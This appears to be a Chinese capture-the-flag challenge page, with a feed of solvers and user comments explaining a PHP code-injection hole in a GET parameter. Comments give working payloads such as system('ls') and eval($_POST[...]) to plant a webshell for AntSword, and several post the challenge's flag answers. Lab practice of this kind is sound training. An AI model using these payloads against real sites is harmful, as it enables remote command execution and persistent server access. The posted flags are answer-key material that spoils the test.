评分(10)
解题动态
aixuexi666 攻破了该题 36分钟前
57 攻破了该题 2小时前
Thompson 攻破了该题 6小时前
song1997 攻破了该题 6小时前
zzz12311 攻破了该题 8小时前
yonge 攻破了该题 11小时前
ruirui102 攻破了该题 12小时前
祥子1 攻破了该题 12小时前
mixiu 攻破了该题 13小时前
tz001 攻破了该题 13小时前
Seb 攻破了该题 14小时前
迷宫 攻破了该题 14小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
评论
freestyle 1年前
举报
s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
000ooo 1年前
举报
?s=eval+($_POST['123'])
ruien 1年前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 1年前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}
迷茫的三千面 1年前
举报
flag{f790b1679ece8cfe8ce3fc425c30896b}
星空 1年前
举报
?s=eval($_POST["cmd"]),再用蚁剑连
星空 1年前
举报
?s=eval($_POST["cmd"])
15824777912 1年前
举报
flag{11393cf7e26fe81d89dc60b63d3a1f52}
whitenul 1年前
举报
flag{9fd11e2660d3ad1f535e9f1de957424a}
InfoSec 1年前
举报
这里的?s=print_r(scandir('./'))是一个GET请求参数,通过GET方式传递给服务器。当服务器执行上述代码时,会调用PHP函数scandir()来列出当前目录下的所有文件和文件夹,并通过print_r()函数将这些目录内容打印输出到页面上。